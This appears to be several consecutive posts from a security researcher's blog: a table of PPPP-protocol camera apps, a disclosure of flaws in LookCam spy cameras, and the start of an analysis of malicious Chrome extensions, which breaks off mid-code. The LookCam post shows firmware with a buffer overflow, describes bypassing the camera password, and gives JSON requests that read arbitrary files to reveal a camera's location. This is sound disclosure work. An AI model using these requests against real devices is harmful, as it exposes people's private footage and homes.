The following is a list of PPPP-based applications I’ve identified so far, at least the ones with noteworthy user numbers. Mind you, these numbers aren’t necessarily indicative of the number of PPPP devices – some applications listed only use PPPP for some devices, likely using other protocols for most of their supported devices (particularly the ones that aren’t cameras). I try to provide a brief overview of the application-level protocol in the footnotes. Disclaimer: These applications tend to support a huge number of device prefixes in theory, so I mostly chose the “typical” ones based on which ones appear in YouTube videos or GitHub discussions.
| Application | Typical device prefixes | Application-level protocol |
|---|---|---|
| Xiaomi Home | XMSYSGB | JSON (MISS) 1 |
| Kami Home, Yi Home, Yi iot | TNPCHNA TNPCHNB TNPUSAC TNPUSAM TNPXGAC | binary 2 |
| Geeni, littlelf smart, Owltron, SmartLife - Smart Living, Tuya - Smart Life,Smart Living | TUYASA | binary (Thing SDK / Tuya SDK) 3 |
| 365Cam, CY365, Goodcam, HDWifiCamPro, PIX-LINK CAM, VI365, X-IOT CAM | DBG DGB DGO DGOA DGOC DGOE NMSA PIXA PIZ | JSON (SHIX) 4 |
| eufy-original, eufy Security, eufy Clean(EufyHome) | HXEUCAM HXUSCAM SECCAMA EUPRDMB | binary 5 |
| eWeLink - Smart Home | EWLK | binary (iCareP2P) 6 |
| Eye4, O-KAM Pro, Veesky | EEEE VSTA VSTB VSTC VSTD VSTF VSTJ | CGI calls 7 |
| CamHi, CamHipro | AAFF EEEE MMMM NNNN PPPP SSAA SSAH SSAK SSAT SSSS TTTT | binary 8 |
| Arenti, CloudEdge, ieGeek Cam, ZUMIMALL | ECIPCM | binary (Meari SDK) 9 |
| YsxLite | BATC BATE PTZ PTZA PTZB TBAT | binary (iLnk) 10 |
| FtyCamPro | FTY FTYA FTYC FTZ FTZW | binary (iLnk) 11 |
| JXLCAM | ACCQ BCCA BCCQ CAMA | CGI calls 12 |
| LookCam | BHCC FHBB GHBB | JSON 13 |
| HomeEye, LookCamPro, StarEye | AYS AYSA TUT | JSON (SHIX) 14 |
| minicam | CAM888 | CGI calls 15 |
| Aqara Home | unknown | JSON 16 |
| App2Cam Plus, OMGuard HD | CGAG CGYU CHXX CMAG CTAI WGAG | binary (Jsw SDK) 17 |
| LOCKLY® | LOCKLYV | binary (iCareP2P) 18 |
| InstarVision | INSTAR VIEW | CGI calls 19 |
Each message starts with a 4 byte command ID. The initial authorization messages (command ID 0x100 and 0x101) contain plain JSON data. Other messages contain ChaCha20-encoded data: first 8 bytes nonce, then the ciphertext. The encryption key is negotiated in the authorization phase. The decrypted plaintext again starts with a 4 byte command ID, followed by JSON data. There is even some Chinese documentation of this interface though it is rather underwhelming. ↩︎
The device-side implementation of the protocol is available on the web. This doesn’t appear to be reverse engineered, it’s rather the source code of the real thing, complete with Chinese comments. No idea who published this or why; I found it linked by people who develop their own modifications of the stock camera firmware. The extensive tnp_eventlist_msg_s structure being sent and received here supports a large number of commands. ↩︎
Each message is preceded by a 16 byte header: 78 56 34 12 magic bytes, request ID, command ID, payload size. This is a very basic interface exposing merely 10 commands, most of which are requesting device information while the rest control video/audio playback. As Tuya SDK also communicates with devices by means other than PPPP, more advanced functionality is probably exposed elsewhere. ↩︎
Messages are preceded by an 8 byte binary header: 06 0A A0 80 magic bytes, four bytes payload size (there is a JavaScript-based implementation). The SHIX JSON format is a translation of this web API interface: /check_user.cgi?user=admin&pwd=pass becomes {"pro": "check_user", "cmd": 100, "user": "admin", "pwd": "pass"}. The pro and cmd fields are redundant, representing a command both as a string and as a number. A very basic implementation of this protocol is available here. ↩︎
This is the only PPPP network I saw making use of the protocol’s DSK feature: connecting to a device requires knowing a DSK key that is issued by the server. It would be interesting to see whether this really produces a significant hurdle towards unauthorized device access. There is a complete open source implementation of the communication protocol, both PPPP and application-level parts. Each message starts with a 16 byte header: 58 5A 59 48 magic bytes, two bytes command ID, two bytes payload size, 00 00 01 00 bytes, channel identifier byte, encryption type byte and two zero bytes. This is followed up by an optional and potentially AES-encrypted payload. Payload can be JSON data but for most commands simpler data representations are being used. Due to the way the AES key is derived, the payload encryption mechanism has been deemed to offer little protection. Interestingly, it appears that the device has no own authentication mechanism and relies solely on DSK protection. ↩︎
Each message is preceded by a 24 byte header starting with the magic bytes 88 88 76 76, payload size and command ID. The other 12 bytes of the header are unused. More than 60 command IDs are supported, each with its own binary payload format. Some very basic commands have been documented in a HomeAssistant component. ↩︎
The binary message headers are similar to the ones used by apps like 365Cam: 01 0A 00 00 magic bytes, four bytes payload size. The payload is however a web request loosely based on this web API interface: GET /check_user.cgi?loginuse=admin&loginpas=pass&user=admin&pwd=pass. Yes, user name and password are duplicated, probably because not all devices expect loginuse/loginpas parameters? There is an outdated implementation of this protocol, lacking support for PPPP encryption or dual authentication. ↩︎
The 24 byte header preceding messages is similar to eWeLink: magic bytes 99 99 99 99, payload size and command ID. The other 12 bytes of the header are unused. Not trusting PPPP, CamHi encrypts the payload using AES. It looks like the encryption key is an MD5 hash of a string containing the user name and password among other things. Somebody published some initial insights into the application code. ↩︎
Each message is preceded by a 52 byte header starting with the magic bytes 56 56 50 99. The bulk of this header is taken up by an authentication token: a SHA1 hex digest hashing the username (always admin), device password, sequence number, command ID and payload size. The implemented interface provides merely 14 very basic commands, essentially only exposing access to recordings and the live stream. So the payload, even where present, is something trivial like a date. As Meari SDK also communicates with devices by means other than PPPP, more advanced functionality is probably exposed elsewhere. ↩︎
The commands and their binary representation are contained within libvdp.so, which is the iLnk implementation of the PPPP protocol. Each message is preceded by a 12 byte header starting with the 11 0A magic bytes. The commands are two bytes long with the higher byte indicating the command type: 2 for SD card commands, 3 for A/V commands, 4 for file commands, 5 for password commands, 6 for network commands, 7 for system commands. ↩︎
While FtyCamPro app handles different networks than YsxLite, it relies on the same libvdp.so library, meaning that the application-level protocol should be the same. It’s possible that some commands are interpreted differently however. ↩︎
The protocol is very similar to the one used by VStarcam apps like O-KAM Pro. The payload has only one set of credentials however, the parameters user and pwd. It’s also a far more limited and sometimes different set of commands. ↩︎
Each message is wrapped in binary data: a prefix starting with A0 AF AF AF before it, the bytes F4 F3 F2 F1 after it. For some reason the prefix length seems to differ depending on whether the message is sent to the device (26 bytes) or received from it (25 bytes). I don’t know what most of it is, yet everything but the payload length at the end of the prefix seems to be irrelevant. This Warwick University paper has some info on the JSON payload. It’s particularly notable that the password sent along with each command isn’t actually being checked. ↩︎
LookCamPro & Co. share significant amounts of code with the SHIX apps like 365Cam, they implement basically the same application-level protocol. There are differences in the supported commands however. It’s difficult to say how significant these differences are because all apps contain significant amounts of dead code, defining commands that are never used and probably not even supported. ↩︎
The minicam app seems to use almost the same protocol as VStarcam apps like O-KAM Pro. It handles other networks however. Also, a few of the commands seem different from the ones used by O-KAM Pro, though it is hard to tell how significant these incompatibilities really are. ↩︎
The JSON data containing command parameters is preceded by a 16 byte header containing the command ID, the payload length and two other values that are ignored other than being quoted verbatim in the response. Commands sent to the device always have even IDs; for the response the device increases the command ID by 1. The 14 exposed commands seem to all deal with audio/video streams and playback controls. Camera configuration must be done by other means. ↩︎
Each message is preceded by a 4 byte header: 3 bytes payload size, 1 byte I/O type (1 for AUTH, 2 for VIDEO, 3 for AUDIO, 4 for IOCTRL, 5 for FILE). The payload starts with a type-specific header. If I read the code correctly, the first 16 bytes of the payload are encrypted with AES-ECB (unpadded) while the rest is sent unchanged. There is an “xor byte” in the payload header which is changed with every request, seemingly to avoid generating identical ciphertexts. Payloads smaller than 16 bytes are not encrypted. I cannot see any initialization of the encryption key beyond filling it with 32 zero bytes, which would mean that this entire mechanism is merely obfuscation. ↩︎
The overall protocol seems identical to eWeLink. However, the smart locks are only supposed to respond to six commands, and the command IDs are different from the ones eWeLink uses. ↩︎
The protocol is very similar to the one used by VStarcam apps like O-KAM Pro, down to sending two sets of credentials. However, the actual CGI endpoints and their parameters are different. ↩︎
I’ve got my hands on an internet-connected camera and decided to take a closer look, having already read about security issues with similar cameras. What I found far exceeded my expectations: fake access controls, bogus protocol encryption, completely unprotected cloud uploads and firmware riddled with security flaws. One could even say that these cameras are Murphy’s Law turned solid: everything that could be done wrong has been done wrong here. While there is considerable prior research on these and similar cameras that outlines some of the flaws, I felt that the combination of severe flaws is reason enough to publish an article of my own.
My findings should apply to any camera that can be managed via the LookCam app. This includes cameras meant to be used with less popular apps of the same developer: tcam, CloudWayCam, VDP, AIBoxcam, IP System. Note that the LookCamPro app, while visually very similar, is technically quite different. It also uses the PPPP protocol for low-level communication but otherwise doesn’t seem to be related, and the corresponding devices are unlikely to suffer from the same flaws.
There seems to be little chance that things will improve with these cameras. I have no way of contacting either the hardware vendors or the developers behind the LookCam app. In fact, it looks like masking their identity was done on purpose here. But even if I could contact them, the cameras lack an update mechanism for their firmware. So fixing the devices already sold is impossible.
I have no way of knowing how many of these cameras exist. The LookCam app is currently listed with almost 1.5 million downloads on Google Play however. An iPhone and a Windows version of the app are also available but no public statistics exist here.
The camera cannot be easily isolated from unauthorized access. It can function as a WiFi access point, but setting a WiFi password isn’t possible. Or it can connect to an existing network, and then it will insist on being connected to the internet. If internet access is removed the camera will go into a reboot loop. So you have the choice of letting anybody in the vicinity access this camera or allowing it to be accessed from the internet.
The communication of this camera is largely unencrypted. The underlying PPPP protocol supports “encryption” which is better described as obfuscation, but the LookCam app almost never makes use of it. Not that it would be of much help, the proprietary encryption algorithms being developed without any understanding of cryptography. These rely on static encryption keys which are trivially extracted from the app but should be easy enough to deduce even from merely observing some traffic.
The camera firmware is riddled with buffer overflow issues which should be trivial to turn into arbitrary code execution. Protection mechanisms like DEP or ASLR might have been a hurdle but these are disabled. And while the app allows you to set an access password, the firmware doesn’t really enforce it. So access without knowing the password can be accomplished simply by modifying the app to skip the password checks.
The only thing preventing complete compromise of any camera is the “secret” device ID which has to be known in order to establish a connection. And by “secret” I mean that device IDs can generally be enumerated but they are “secured” with a five letter verification code. Unlike with some similar cameras, the algorithm used to generate the verification code isn’t public knowledge yet. So somebody wishing to compromise as many cameras as possible would need to either guess the algorithm or guess the verification codes by trying out all possible combinations. I suspect that both approaches are viable.
And while the devices themselves have access passwords which a future firmware version could in theory start verifying, the corresponding cloud service has no authentication beyond knowledge of the device ID. So any recordings uploaded to the cloud are accessible even if the device itself isn’t. Even if the camera owner hasn’t paid for the cloud service, anyone could book it for them if they know the device ID. The cloud configuration is managed by the server, so making the camera upload its recordings doesn’t require device access.
Most cameras connecting to the LookCam app are being marketed as “spy cam” or “nanny cam.” These are made to look like radio clocks, USB chargers, bulb sockets, smoke detectors, even wall outlets. Most of the time their pretended functionality really works. In addition they have an almost invisible pinhole camera that can create remarkably good recordings. I’ve seen prices ranging from US$40 to hundreds of dollars.
The marketing spin says that these cameras are meant to detect when your house is being robbed. Or maybe they allow you to observe your baby while it is in the next room. Of course, in reality people are far more inventive in their use of tiny cameras. Students discovered them for cheating in exams. Gamblers use them to get an advantage at card games. And then there is of course the matter of non-consensual video recordings. So next time you stay somewhere where you don’t quite trust the host you might want to search for “LookCam” on YouTube, just to get an idea of how to recognize such devices.
The camera I had was based on the Anyka AK39Ev330 hardware platform, essentially an ARM CPU with an attached pinhole camera. Presumably, other cameras connecting to the LookCam app are similar, even though there are some provisions for hardware differences in the firmware. The device looked very convincing, its main giveaway being unexpected heat development.
All LookCam cameras I’ve seen were strictly no-name devices; it is unclear who builds them. Given the variety of competing form factors I suspect that a number of hardware vendors are involved. Maybe there is one vendor producing the raw camera kit and several others who package it within the respective casings.
The LookCam app can manage a number of cameras. Some people demonstrating the app on YouTube had around 50 of them, though I suspect that these are camera sellers and not regular users.
While each camera can be given a custom name, its unique ID is always visible as well. For example, the first camera listed in the screenshot above has the ID GHBB-000001-NRLXW, which the app shortens to G000001NRLXW. Here GHBB is the device prefix: LookCam supports a number of these but only BHCC, FHBB and GHBB seem to exist in reality (abbreviated as B, F and G respectively). 000001 is the device number, each prefix can theoretically support a million devices. The final part is a five-letter verification code: NRLXW. This one has to be known for the device connection to succeed; it makes enumerating device IDs more difficult.
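Just to illustrate the mapping, here is a hypothetical helper based on the abbreviations mentioned above:
# The three prefixes that seem to exist in reality, with their one-letter forms.
PREFIXES = {'B': 'BHCC', 'F': 'FHBB', 'G': 'GHBB'}

def expand_device_id(short_id: str) -> str:
    # G000001NRLXW -> GHBB-000001-NRLXW
    prefix = PREFIXES[short_id[0]]
    return f'{prefix}-{short_id[1:7]}-{short_id[7:]}'

print(expand_device_id('G000001NRLXW'))  # GHBB-000001-NRLXW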
Out of the box, the device is in access point mode: it provides a WiFi access point with the device ID used as wireless network name. You can connect to that access point, and LookCam will be able to find the camera via a network broadcast, allowing you to configure it. You might be inclined to leave the camera in access point mode but it is impossible to set a WiFi password. This means that anybody in the vicinity can connect to this WiFi network and access the camera through it. So there is no way around configuring the camera to connect to your network.
Once the camera is connected to your network the P2P “magic” happens. LookCam app can still find the camera via a network broadcast. But it can also establish a connection when you are not on the same network. In other words: the camera can be accessed from the internet, assuming that someone knows its device ID.
Exposing the camera to internet-based attacks might not be something that you want, with it being in principle perfectly capable of writing its recordings to an SD card. But if you deny it access to the internet (e.g. via a firewall rule) the camera will try to contact its server, fail, panic and reboot. It will keep rebooting until it receives a response from the server.
Another thing to note: the device ID is displayed on pretty much every screen of this app. So when users share screenshots or videos of the app (which they do often) they will inevitably expose the ID of their camera, allowing anyone in the world to connect to it. I’ve seen very few cases of people censoring the device ID; clearly most of them aren’t aware that it is sensitive information. The LookCam app definitely isn’t communicating that it is.
How can LookCam establish a connection to the camera having only its device ID? The app uses the PPPP protocol developed by the Chinese company CS2 Network. Supposedly, in 2019 CS2 Network had 300 customers with 20 million devices in total. This company supplies its customers with a code library and the corresponding server code which the customers can run as a black box. The idea of the protocol is providing an equivalent of the TCP protocol which implicitly locates a device by its ID and connects to it.
Side note: Whoever designed this protocol didn’t really understand TCP. For example, they tried to replicate the fault tolerance of TCP. But instead of making retransmissions an underlying protocol feature there are dozens of different (not duplicated but really different) retransmission loops throughout the library. Where TCP tries to detect network congestion and back off, the PPPP protocol will send even more retransmitted messages, rendering suboptimal connections completely unusable.
Despite being marketed as Peer-to-Peer (P2P) this protocol relies on centralized servers. Each device prefix is associated with a set of three servers, this being the protocol designers’ idea of high-availability infrastructure. Devices regularly send messages to all three servers, making sure that these are aware of the device’s IP address. When the LookCam app (client) wants to connect to a device, it also contacts all three servers to get the device’s IP address.
The P2P part is the fact that device and client try to establish a direct connection instead of relaying all communication via a central server. The complicating factor here are firewalls which usually disallow direct connections. The developers didn’t like established approaches like Universal Plug and Play (UPnP), probably because these are often disabled for security reasons. So they used a trick called UDP hole punching. This involves guessing which port the firewall assigned to outgoing UDP traffic and then communicating with that port, so that the firewall considers incoming packets a response to previously sent UDP packets and allows them through.
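In case the trick is new to you, here is a conceptual sketch of UDP hole punching. This is not the PPPP implementation, merely an illustration of the general idea:
import socket

def punch_hole(local_port: int, peer_ip: str, peer_port: int) -> socket.socket:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('0.0.0.0', local_port))
    # Outgoing packets make the firewall/NAT create a mapping, so packets
    # arriving from peer_ip:peer_port are then treated as responses. Both
    # sides do this after learning each other's public address and (guessed)
    # port from a rendezvous server.
    for _ in range(3):
        sock.sendto(b'punch', (peer_ip, peer_port))
    return sock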
Does that always work? That’s doubtful. So the PPPP protocol allows for relay servers to be used as fallback, forwarding traffic from and to the device. But this direct communication presumably succeeds often enough to keep the traffic on PPPP servers low, saving costs.
The FHBB and GHBB device prefixes are handled by the same set of servers, named the “mykj” network internally in the LookCam app. The same string appears in the name of the main class as well, indicating that it likely refers to the company developing the app. This seems to be a short form of “Meiyuan Keji,” a company name that translates as “Dollar Technology.” I couldn’t find any further information on this company however.
The BHCC device prefix is handled by a different set of servers that the app calls the “hekai” network. The corresponding devices appear to be marketed in China only.
With potentially very sensitive data being transmitted one would hope that the data is safely encrypted in transit. The TCP protocol outsources this task to additional layers like TLS. The PPPP protocol on the other hand has built-in “encryption,” in fact even two different encryption mechanisms.
First there is the blanket encryption of all transmitted messages. The corresponding function is aptly named P2P_Proprietary_Encrypt and it is in fact a very proprietary encryption algorithm. To my untrained eye there are a few issues with it. One of them: known plaintext is readily available, since communication starts with the MSG_HELLO message (it is known that the first message sent to port 32100 is four bytes with the plaintext F1 00 00 00).
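Producing that plaintext yourself is trivial as well. Here is a sketch that sends an unencrypted MSG_HELLO to a server (the address is a placeholder, and only networks that don’t enforce encryption will answer it):
import socket

def send_hello(server_ip: str, port: int = 32100) -> bytes:
    # MSG_HELLO: magic byte F1, message type 00, two length bytes - all known.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(3)
    sock.sendto(b'\xf1\x00\x00\x00', (server_ip, port))
    data, _ = sock.recvfrom(1024)
    return data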
In addition to that, some messages get special treatment. For example, the MSG_REPORT_SESSION_READY message is generally encrypted via the P2P_Proprietary_Encrypt function with a key that is hardcoded in the CS2 library and has the same value in every app I checked.
Some messages employ a different encryption method. In case of the networks supported by LookCam it is only the MSG_DEV_LGN_CRC message (device registering with the server) that is used instead of the plaintext MSG_DEV_LGN message. As this message is sent by the device, the corresponding encryption key is only present in the device firmware, not in the application. I didn’t bother checking whether the server would still accept the unencrypted MSG_DEV_LGN message.
The encryption function responsible here is PPPP_CRCEnc. No, this isn’t a cyclic redundancy check (CRC). It’s rather an encryption function that will extend the plaintext by four bytes of padding. The decryptor will validate the padding, presumably that’s the reason for the name.
Of course, this still doesn’t make it an authenticated encryption scheme, yet the padding oracle attack is really the least of its worries. While there is a complicated selection approach, it effectively results in a sequence of bytes that the plaintext is XOR’ed with. Same sequence for every single message being encrypted in this way. Wikipedia has the following to say on the security of XOR ciphers:
By itself, using a constant repeating key, a simple XOR cipher can trivially be broken using frequency analysis. If the content of any message can be guessed or otherwise known then the key can be revealed.
Well, yes. That’s what we have here.
It’s doubtful that any of these encryption algorithms can deter even a barely determined attacker, particularly given known plaintext like the MSG_HELLO message. Still, blanket encryption with P2P_Proprietary_Encrypt would at least have raised the bar somewhat – yet LookCam doesn’t enable it.
It is obvious that the designers of the PPPP protocol don’t understand cryptography, yet for some reason they don’t want to use established solutions either. It cannot even be about performance because AES is supported in hardware on these devices. But why for example this strange choice of encrypting a particular message while keeping the encryption of highly private data optional? Turns out, this is due to the threat model used by the PPPP protocol designers.
As a CS2 Network presentation deck shows, their threat model isn’t concerned about data leaks. The concern is rather denial-of-service attacks caused by registering fake devices. And that’s why this one message enjoys additional encryption. Not that I really understand the concern here, since the supposed hacker would still have to generate valid device IDs somehow. And if they can do that – well, them bringing the server down should really be the least concern.
But wait, there is another security layer here!
This is about the “init string” already mentioned in the context of encryption keys above. It also contains the IP addresses of the servers, mildly obfuscated. While these were “given to platform owner only,” they are necessarily contained in the LookCam app.
Some other apps contain dozens of such init strings, allowing them to deal with many different networks. So the threat model of the PPPP protocol cannot imagine someone extracting the “encrypted P2P server IP string” from the app. It cannot imagine someone reverse engineering the (trivial) obfuscation used here. And it definitely cannot imagine someone reverse engineering the protocol, so that they can communicate with the servers via “raw IP string” instead of their obfuscated one. Note: The latter has happened on several documented occasions already, e.g. here.
These underlying assumptions become even more obvious on another slide of that presentation.
Yes, the only imaginable way to read out network data is via the API of their library. With a threat model like this, it isn’t surprising that the protocol makes all the wrong choices security-wise.
Once a connection is established the LookCam app and the camera will exchange JSON-encoded messages like the following:
{
"cmd": "LoginDev",
"pwd": "123456"
}
A paper from the University of Warwick already took a closer look at the firmware and discovered something surprising. The LookCam app will send a LoginDev command like the one above to check whether the correct access password is being used for the device. But sending this command is entirely optional, and the firmware will happily accept other commands without a “login”!
The LookCam app will also send the access password along with every other command, yet this password isn’t checked by the firmware either. I made a trivial modification to the LookCam app so that it ignores the result of the LoginDev command. This in fact bypassed the authentication completely, allowing me to access my camera despite a wrong password.
I could also confirm their finding that the DownloadFile command will read arbitrary files, allowing me to extract the firmware of my camera with the approach described in the paper. They even describe a trivial Remote Code Execution vulnerability which I also found in my firmware: that firmware often relies on running shell commands for tasks that could be easily done in its C language code.
This clearly isn’t the only Remote Code Execution vulnerability however. Here is some fairly typical code for this firmware:
char buf[256];
char *cmd = cJSON_GetObjectItem(request, "cmd")->valuestring;
memset(buf, 0, sizeof(buf));
memcpy(buf, cmd, strlen(cmd));   /* copies strlen(cmd) bytes into a 256 byte stack buffer */
This code copies a string (pointlessly, but that isn’t the issue here). It completely fails to consider the size of the target buffer, going by the size of the incoming data instead. So any command larger than 255 bytes will cause a buffer overflow. And there is no stack canary here; Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) are disabled as well, so nothing prevents this buffer overflow from being turned into Remote Code Execution.
Finally, I’ve discovered that the searchWiFiList command will produce the list of WiFi networks visible to the camera. These by themselves often allow a good guess as to where the camera is located. In combination with a geolocation service they will typically narrow down the camera’s position to a radius of only a few dozen meters.
The only complication here: most geolocation services require not the network names but the MAC addresses of the access points, and the MAC addresses aren’t part of the response data. But searchWiFiList works by running the iwlist shell command and storing its complete output in the file /tmp/wifi_scan.txt. It reads this file but does not remove it. This means that the file can subsequently be downloaded via the DownloadFile command (which, as mentioned above, allows reading arbitrary files), and it contains the full data including the MAC addresses of all access points. So somebody who happened to learn the device ID can not only access the video stream but also find out where exactly this footage is being recorded.
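For illustration, the whole location leak boils down to two JSON commands like the ones below. The cmd values and the file path are as described above; the pwd value and the name of the file parameter are assumptions on my part.

// 1. Make the camera scan for WiFi networks; the iwlist output ends up in /tmp/wifi_scan.txt.
const scanRequest = { "cmd": "searchWiFiList", "pwd": "123456" };

// 2. Retrieve the complete scan output, including access point MAC addresses,
//    via the arbitrary file read ("path" is an assumed parameter name).
const downloadRequest = { "cmd": "DownloadFile", "path": "/tmp/wifi_scan.txt", "pwd": "123456" };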
The camera I’ve been looking at is running firmware version 2023-11-22. Is there a newer version, maybe one that fixes the password checks or the already published Remote Code Execution vulnerability? I have no idea. If the firmware for these cameras is available somewhere online then I cannot find it. I’ve also been looking for some kind of update functionality in these devices. But there is only a generic script from the Anyka SDK which isn’t usable for anyone other than maybe the hardware vendor.
When looking at the firmware I noticed some code uploading 5 MiB data chunks to api.l040z.com (or apicn.l040z.com if you happen to own a BHCC device). Now uploading exactly 5 MiB is weird (this size is hardcoded) but inspecting the LookCam app confirmed it: this is cloud functionality, and the firmware regularly uploads videos in this way. At least it does that when cloud functionality is enabled.
First thing worth noting: while the cloud server uses regular HTTP rather than some exotic protocol, all connections to it are unencrypted. The firmware simply lacks a TLS library it could use, and so the server doesn’t bother with supporting TLS. Meaning, for example: if you happen to use their cloud functionality, your ISP had better be very trustworthy, because it can see all the data your camera sends to the LookCam cloud. In fact, your ISP could even run its own “cloud server” and the camera would happily send your recorded videos to it.
Anyone dare a guess what the app developers mean by “financial-grade encryption scheme” here? Is it worse or better than military-grade encryption?
Second interesting finding: the cloud server has no authentication whatsoever. The camera only needs to know its device ID when uploading to the cloud. And the LookCam app – well, any cloud-related requests here also require device ID only. If somebody happens to learn your device ID they will gain full access to your cloud storage.
Now you might think that you can simply skip paying for the cloud service which, depending on the package you book, can cost as much as $40 per month. But this doesn’t put you on the safe side: you aren’t the one controlling the cloud functionality on your device, the cloud server is. Every time the device boots up it sends a request to http://api.l040z.com/camera/signurl and the response tells it whether cloud functionality needs to be enabled.
So if LookCam developers decide that they want to see what your camera is doing (or if Chinese authorities become interested in that), they can always adjust that server response and the camera will start uploading video snapshots. You won’t even notice anything because the LookCam app checks cloud configuration by requesting http://api.l040z.com/app/cloudConfig which can remain unchanged.
And they aren’t the only ones who can enable the cloud functionality of your device. Anybody who happens to know your device ID can buy a cloud package for it. This way they can get access to your video recordings without ever accessing your device directly. And you will only notice the cloud functionality being active if you happen to go to the corresponding tab in the LookCam app.
Now that you are aware of device IDs being highly sensitive data, you certainly won’t upload screenshots containing them to social media. Does that mean that your camera is safe because nobody other than you knows its ID?
The short answer is: you don’t know that. First of all, you simply don’t know who already has your device ID. Did the shop that sold you the camera write the ID down? Did they maybe record a sales pitch featuring your camera before they sold it to you? Did somebody notice your camera’s device ID show up in the list of WiFi networks when it was running in access point mode? Did anybody coming to your home run a script to discover PPPP devices on the network? Yes, all of that might seem unlikely, yet it should be reason enough to wonder whether your camera’s recordings are really as private as they should be.
Then there is the issue of unencrypted data transfers. Whenever you connect to your camera from outside your home network the LookCam app will send all data unencrypted – including the device ID. Do you do that when connected to public WiFi? At work? In a vacation home? You don’t know who else is listening.
And finally there is the matter of verification codes, which are the only mechanism preventing somebody from enumerating all device IDs. How difficult would it be to guess a verification code? Verification codes seem to use 22 letters (all Latin uppercase letters except A, I, O and Q). With five letters this means around 5 million possible combinations. According to Paul Marrapese, PPPP servers don’t implement rate limiting (page 33), making trying out all these combinations perfectly realistic – maybe not for all possible device IDs but definitely for some.
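A quick back-of-the-envelope check of that number, assuming five code letters drawn from the 22 remaining characters:

// All Latin uppercase letters except A, I, O and Q, as estimated above.
const alphabet = "BCDEFGHJKLMNPRSTUVWXYZ";
console.log(alphabet.length);      // 22
console.log(alphabet.length ** 5); // 5153632 candidate codes per device ID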
But that resource-intensive approach is only necessary as long as the algorithm used to generate verification codes is a secret. Yet we have to assume that at least CS2 Network’s 300 customers have access to that algorithm, given that their server software somehow validates device IDs. Are they all trustworthy? How much would it cost to become a “customer” simply in order to learn that algorithm?
And even if we are willing to assume that CS2 Network runs proper background checks to ensure that their algorithm remains a secret: how difficult would it be to guess that algorithm? I found a number of device IDs online, and my primitive analysis of their verification codes indicates that these aren’t distributed uniformly. There is a noticeable affinity for certain prime numbers, so the algorithm behind them is likely a hack job similar to the other CS2 Network algorithms, throwing in mathematical operations and table lookups semi-randomly to make things look complicated. How long would this approach hold up if somebody with actual cryptanalysis knowledge decided to figure it out?
So if you happen to own one of these cameras, what does all this mean to you? Even if you never disclosed the camera’s device ID yourself, you cannot rely on it staying a secret. And this means that whatever your camera is recording is no longer private.
Are you using it as a security camera? Your security camera might now inform potential thieves of the stuff that you have standing around and the times when you leave home. It will also let them know where exactly you live.
Are you using it to keep an eye on your child? Just… don’t. Even if you think that you yourself have a right to violate your child’s privacy, you really don’t want anybody else to watch.
And even if you “have nothing to hide”: somebody could compromise the camera in order to hack other devices on your network or simply to make it part of a botnet. Such things have happened before, many times actually.
So the best solution is to dispose of this camera ASAP. Please don’t sell it, because that only moves the problem to the next person. The main question is: how do you know that the camera you get instead will do better? I can only think of one indicator: if you want to access the camera from outside your network, it should involve explicit setup steps, likely changing the router configuration. The camera shouldn’t just expose itself to the internet automatically.
But if you actually paid hundreds of dollars for that camera and dumping it isn’t an option: running it in a safe manner is complicated. As I mentioned already, simply blocking internet access for the camera won’t work. There are ways to work around that, but they are complex enough not to be worth the effort. You are probably better off installing a custom firmware. I haven’t tried it, but at least this one looks like somebody actually thought about security.
As far as I am aware, the first research on the PPPP protocol was published by Paul Marrapese in 2019. He found a number of vulnerabilities, including one brand of cameras shipping their algorithm to generate verification codes with their client application. Knowing this algorithm, device IDs could be enumerated easily. Paul used this flaw to display the locations of millions of affected devices. His DEF CON talk is linked from the website and well worth watching.
Edit (2025-09-15): I was wrong, there is at the very least this early analysis of the protocol by Zoltán Balázs (2016) (starting at page 29) and some research into a particular brand of PPPP-based cameras by Pierre Kim (2017).
A paper from the University of Warwick (2023) researched the LookCam app specifically. In addition to some vulnerabilities I mentioned here, it contains a number of details on how these cameras operate.
This Elastic Labs article (2024) took a close look at some other PPPP-based cameras, finding a number of issues.
The CS2 Network sales presentation (2016) offers a fascinating look into the thinking of PPPP protocol designers and into how their system was meant to work.
Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn’t possible to analyze their functionality in detail.
However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.
Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality and clears extension storage. Luckily, I’ve saved both the previous version and its storage contents.
Since my previous article I found a bunch more extensions with malicious functionality that is almost identical to Download Manager Integration Checklist. The extension Auto Resolution Quality for YouTube™ does not seem to be malicious (yet?) but shares many remarkable oddities with the other extensions.
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Freemybrowser | 10,000 | bibmocmlcdhadgblaekimealfcnafgfn | ✓ |
| AutoHD for Twitch™ | 195 | didbenpmfaidkhohcliedfmgbepkakam | |
| Free simple Adult Blocker with password | 1,000 | fgfoepffhjiinifbddlalpiamnfkdnim | |
| Convert PDF to JPEG/PNG | 20,000 | fkbmahbmakfabmbbjepgldgodbphahgc | |
| Download Manager Integration Checklist | 70,000 | ghkcpcihdonjljjddkmjccibagkjohpi | ✓ |
| Auto Resolution Quality for YouTube™ | 223 | hdangknebhddccoocjodjkbgbbedeaam | |
| Adblock.mx - Adblock for Chrome | 1,000 | hmaeodbfmgikoddffcfoedogkkiifhfe | ✓ |
| Auto Quality for YouTube™ | 100,000 | iaddfgegjgjelgkanamleadckkpnjpjc | |
| Anti phising safer browsing for chrome | 7,000 | jkokgpghakemlglpcdajghjjgliaamgc | ✓ |
| Darktheme for google translate | 40,000 | nmcamjpjiefpjagnjmkedchjkmedadhc | ✓ |
Additional IOCs:
The Download Manager Integration Checklist extension was an odd one on the list in my previous article. It has very minimal functionality: it’s merely supposed to display a set of instructions. This is a task that doesn’t require any permissions at all, yet the extension requests access to all websites and the declarativeNetRequest permission. Apparently, nobody has noticed this inconsistency so far.
Looking at the extension code, there is another oddity. The checklist displayed by the extension is downloaded from Firebase, Google’s online database. Yet there is also a download from https://help.internetdownloadmanager.top/checklist, with the response being handled by this function:
async function u(l) {
await chrome.storage.local.set({ checklist: l });
await chrome.declarativeNetRequest.updateDynamicRules({
addRules: l.list.add,
